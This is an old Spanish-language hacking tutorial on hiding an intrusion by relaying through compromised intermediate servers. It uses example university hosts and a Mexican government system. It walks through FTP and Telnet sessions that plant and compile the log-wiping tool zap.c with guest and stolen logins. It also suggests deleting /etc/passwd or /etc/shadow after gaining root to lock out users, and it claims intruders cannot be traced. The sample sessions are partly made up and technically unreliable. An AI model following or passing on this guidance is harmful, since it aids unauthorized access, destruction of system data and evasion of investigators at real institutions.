Hackear con condón HACKEAR CON CONDÓN Esto significa que cuando quieras hackear algun sistema usando Telnet y FTP pongas barreras entre tu y el sistema objetivo. En el siguiente diagrama se muestra un hacker sin proteccion: ----------- ------------ | hacker |-----------| objetivo | ----------- ------------ Ahora aqui se muestra un Hacker con algo de experiencia: ------------ ------------- | hacker |----------| condon #1 | ------------ ------------- | | ------------ ------------- | objetivo |-----------| condon #2 | ------------ ------------- Supongamos que tienes la cuenta R00T y se te ocurre borrar el /etc/passwd o el /etc/shadow para sacar de circulacion a los usuarios de ese servidor por un buen tiempo pero tienes miedo que puedan rastrearte. La solucion es simple. Cuando realizas una conexion en Internet no la haces directamente sino que pasas por una serie de servidores que finalmente te hacen llegar a tu objetivo, por lo que si realizas una conexion protegida como el ejemplo imaginate cuantos sistemas tendrian que investigar para finalmente llegar a ti. Como puedes darte cuenta, agarrarte es imposible. Ahora te presento un ejemplo de conexion Protegida Si quisieramos poner el codigo fuente del script ZAP.C en el sistema objetivo (mexico.gob.mx) usando como proteccion los sistemas condon1 (itesm.mx.edu) y condon2 (unam.mx.edu) tendriamos que sabernos por lo menos el login y password de la cuenta GUEST y conocer un directorio donde podamos escribir en cada uno de estos sistemas (generalmente /incoming /tmp /temp). Ahora, supongamos que nuestro script esta en /usuarios/pepe/zap.c [ Los caracteres pegados al inicio del texto son outputs del sistema ] % ftp ftp> open itesm.mx.edu UNIX v.4.5 Login: guest Password: xxxxxx Bienvenido a ITESM.MX.EDU COMMAND? ftp> put /usuarios/pepe/zap.c /incoming/zap.c Transfer File Complete % open unam.mx.edu IRIS v.3.5 Please Login Login: guest Password: xxxx Bienvenido al sistema de la Universidad de BLAH BLAH ftp> put /incoming/zap.c /temp/zap.c Archivos Recibidos! ftp> open mexico.gov.mx Este sistema es para uso del gobierno unicamente, cualquier persona que sea sorprendida usando una cuenta que no le pertenezca sera perseguida. Login: zedillo Password: xxxxxxxx Bienvenido! ftp> put /temp/zap.c /tmp/zap.c ftp> close connection closed ftp> close connection closed ftp> close connection closed ftp> quit Espero hayan entendido el ejemplo anterior, no significa que lo hagan igual pero es una idea que me ha servido de mucho. En algunos casos sustituye el comando PUT por SEND. Ahora para compilar ese script con el mismo nivel de proteccion necesitas realizar lo mismo pero con conexiones Telnet. % telnet itesm.mx.edu UNIX v.4.5 Login: guest Password: xxxxxx Bienvenido a ITESM.MX.EDU COMMAND? % telnet unam.mx.edu IRIS v.3.5 Please Login Login: guest Password: xxxx Bienvenido al sistema de la Universidad de BLAH BLAH % telnet mexico.gov.mx Este sistema es para uso del gobierno unicamente, cualquier persona que sea sorprendida usando una cuenta que no le pertenezca sera perseguida. Login: zedillo Password: xxxxxxxx Bienvenido! % cd /tmp % cc -o zap zap.c Compile Succesful! % zap